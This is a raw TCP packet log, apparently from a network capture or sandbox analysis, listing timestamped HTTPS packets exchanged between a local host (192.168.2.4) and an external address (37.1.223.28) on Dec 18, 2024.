Dec 18, 2024 23:06:12.811547041 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.811615944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.811630964 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.811659098 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.811682940 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.818778992 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.818799973 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.818869114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.818886042 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.818916082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.818937063 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.824609041 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.824631929 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.824697971 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.824717045 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.824769020 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.834697962 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.880235910 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.880263090 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.880347967 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.880373955 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.880429983 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.980026007 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.980053902 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.980115891 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.980163097 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.980195045 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.980216980 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.986848116 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.986875057 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.986926079 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.986946106 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.986979008 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.987000942 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.993350029 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.993381977 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.993422031 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.993444920 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.993470907 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.993489981 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.999015093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.999036074 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.999103069 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.999128103 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:12.999164104 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:12.999185085 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.005845070 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.005865097 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.005964041 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.005980968 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.006036997 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.012130022 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.012151957 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.012216091 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.012231112 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.012258053 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.012279034 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.018903971 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.018929958 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.018991947 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.019006014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.019035101 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.019051075 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.072479010 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.072505951 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.072572947 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.072596073 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.072626114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.072649956 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.172214985 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.172244072 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.172302008 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.172352076 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.172384024 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.172414064 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.178510904 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.178535938 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.178579092 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.178591967 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.178607941 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.178632021 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.185283899 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.185308933 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.185353041 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.185370922 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.185389042 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.185421944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.191076994 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.191102028 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.191148996 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.191174030 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.191200018 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.191215992 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.197801113 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.197824955 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.197969913 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.197969913 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.198003054 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.198057890 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.204164982 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.204184055 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.204236031 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.204251051 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.204269886 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.204354048 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.210947037 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.210968018 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.211018085 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.211034060 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.211064100 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.211081028 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.264625072 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.264678001 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.264718056 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.264743090 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.264766932 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.264794111 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.364454031 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.364510059 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.364540100 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.364578009 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.364599943 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.364630938 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.370661974 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.370706081 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.370733023 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.370740891 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.370774984 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.370795012 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.377464056 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.377511024 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.377540112 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.377547979 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.377578020 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.377592087 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.383275032 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.383337975 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.383342028 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.383368015 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.383404016 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.383430004 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.390072107 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.390115976 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.390150070 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.390162945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.390192032 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.390212059 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.396410942 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.396454096 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.396486998 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.396495104 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.396534920 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.396544933 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.403192997 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.403253078 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.403278112 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.403285027 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.403330088 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.403342962 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.456630945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.456679106 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.456707954 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.456723928 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.456753016 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.456789970 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.556710005 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.556763887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.556806087 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.556879044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.556917906 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.556941986 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.562478065 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.562525988 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.562551975 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.562606096 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.562621117 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.562669992 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.569305897 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.569349051 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.569389105 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.569401979 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.569431067 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.569448948 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.576050997 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.576096058 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.576133966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.576145887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.576178074 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.576195002 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.581957102 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.582000017 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.582037926 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.582051039 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.582079887 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.582096100 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.589199066 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.589257956 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.589281082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.589294910 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.589332104 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.589350939 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.594984055 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.595029116 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.595067978 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.595083952 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.595109940 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.595129013 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.657437086 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.657500982 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.657546997 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.657584906 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.657608986 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.657634020 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.748620987 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.748681068 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.748713970 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.748754978 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.748785973 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.748807907 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.755021095 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.755068064 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.755110025 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.755126953 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.755155087 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.755172968 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.761192083 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.761240959 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.761254072 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.761281013 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.761315107 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.761346102 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.761367083 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.767980099 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.768026114 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.768055916 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.768073082 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.768104076 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.768130064 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.773734093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.773755074 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.773813963 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.773823977 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.773864985 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.781213999 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.781260014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.781282902 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.781295061 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.781326056 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.781338930 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.787487030 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.787556887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.787575006 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.787584066 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.787621021 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.787630081 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.849026918 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.849092960 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.849103928 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.849122047 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.849162102 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.849174976 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.941351891 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.941425085 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.941451073 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.941503048 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.941540003 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.941561937 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.947721958 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.947782993 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.947807074 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.947823048 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.947868109 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.947868109 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.954427004 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.954485893 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.954507113 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.954523087 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.954554081 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.954572916 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.960752010 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.960813046 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.960828066 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.960843086 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.960875988 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.960896015 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.967525005 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.967583895 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.967601061 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.967616081 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.967644930 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.967684031 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.973850012 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.973907948 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.973915100 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.973951101 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.973968983 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.974001884 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.979680061 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.979739904 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.979773998 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.979793072 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:13.979821920 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:13.979844093 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.046019077 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.046103954 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.046102047 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.046134949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.046163082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.046183109 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.133408070 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.133476973 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.133490086 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.133502960 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.133552074 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.139799118 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.139861107 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.139873028 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.139902115 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.139920950 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.139944077 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.145989895 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.146045923 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.146056890 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.146104097 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.146117926 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.146150112 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.155513048 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.155581951 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.155599117 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.155616045 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.155642033 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.155658007 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.159440994 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.159462929 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.159507036 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.159518003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.159548044 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.159559965 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.166208982 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.166237116 CET	443	49732	37.1.223.28	192.168.2.4
